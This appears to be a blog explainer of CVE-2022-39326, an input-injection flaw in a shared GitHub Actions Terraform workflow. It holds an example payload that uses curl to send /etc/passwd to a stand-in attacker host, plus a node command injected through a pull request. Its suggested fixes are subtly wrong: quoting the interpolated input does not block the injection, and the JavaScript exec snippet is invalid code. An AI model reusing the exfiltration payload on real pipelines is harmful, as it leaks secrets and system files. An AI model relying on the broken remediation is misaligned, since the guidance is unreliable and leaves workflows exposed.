GitHub Actions has become the go-to automation tool for many developers, and kartverket/github-workflows offers shared reusable workflows to simplify deploys and infrastructure as code (IaC). But not long ago, a significant security risk was discovered in these shared workflows—and it could have let an attacker take over your GitHub Actions runner with just a malicious pull request (PR).
In this deep dive, we’ll break down what CVE-2022-39326 is, why it’s dangerous, how an exploit can work, and how you can stay safe. You’ll see real code snippets, reference links, and practical tips. Let’s make sure your workflow isn’t wide open to attackers!
What is CVE-2022-39326?
- CVE-2022-39326 is a security vulnerability reported in kartverket/github-workflows, a collection of reusable GitHub Actions workflows.
All users of the run-terraform workflow in versions before 2.7.5 are affected.
- The problem: Someone could submit a pull request containing malicious input. This input could get executed as JavaScript in the workflow, giving the attacker the same power as the workflow.
Quick reference:
GitHub Advisory GHSA-qwmj-rrrj-rh5v
NVD Entry for CVE-2022-39326
How Does the Vulnerability Work?
GitHub Actions workflows often use inputs—both as environment variables and as interpolated strings inside scripts or actions. If these inputs aren’t sanitized or validated, an attacker can inject arbitrary code.
In vulnerable versions of kartverket/github-workflows, the run-terraform reusable workflow failed to properly sanitize variables passed from the GitHub Action caller. If an attacker can submit a pull request and control a workflow input, they can sneak malicious code into the CI/CD pipeline.
Simple Example: The Dangerous Step
Let’s take a simplified look at the kind of mistake that led to CVE-2022-39326.
jobs:
run-terraform:
steps:
- name: Run Terraform Plan
run: |
terraform plan ${{ inputs.terraform_args }}
Assume terraform_args is a user-supplied input. Looks harmless? Now, imagine someone submits a PR with:
with:
terraform_args: '; curl -d @/etc/passwd https://evil-website.com ;'
The generated script would be
terraform plan ; curl -d @/etc/passwd https://evil-website.com ;
Result: The attacker’s command executes, leaking sensitive data.
Poisoned Pull Request
The attacker submits a PR that changes an Action input, maybe in a workflow_dispatch or similar event trigger.
exploitable-job
uses: kartverket/github-workflows/.github/workflows/run-terraform.yml@v2.7.4
with
terraform_args: '; node -e "require(\'fs\').writeFileSync(\'steal.txt\',require(\'os\').userInfo().username)"'
Code Execution
When maintainers trigger the workflow or if it’s run automatically on PRs, the malicious input executes.
Attacker can steal secrets, tokens, or environment variables from the GitHub Action runner.
- CI/CD Hijack
Upgrade Now
The only safe fix is to upgrade to at least version 2.7.5 of kartverket/github-workflows.
Just change your workflow reference
uses: kartverket/github-workflows/.github/workflows/run-terraform.yml@v2.7.5
Use argument arrays instead of string concatenation
run: |
terraform plan "${{ inputs.terraform_args }}"
Or, in JavaScript-based action
const { exec } = require('child_process');
// Instead of directly using user inputs in command
exec(terraform plan '${escapedInput}');
References
- GitHub Security Advisory for CVE-2022-39326
- kartverket/github-workflows repository
- Learn about reusable workflows
Summary
CVE-2022-39326 is a reminder that even “reusable” code has risks—especially when it forms part of your automation pipeline! If you use kartverket/github-workflows’s run-terraform in your project, make sure you’re running version 2.7.5 or higher. Don’t let attackers ride your CI/CD pipeline to your infrastructure.
Timeline
Published on: 10/25/2022 17:15:00 UTC
Last modified on: 10/28/2022 19:26:00 UTC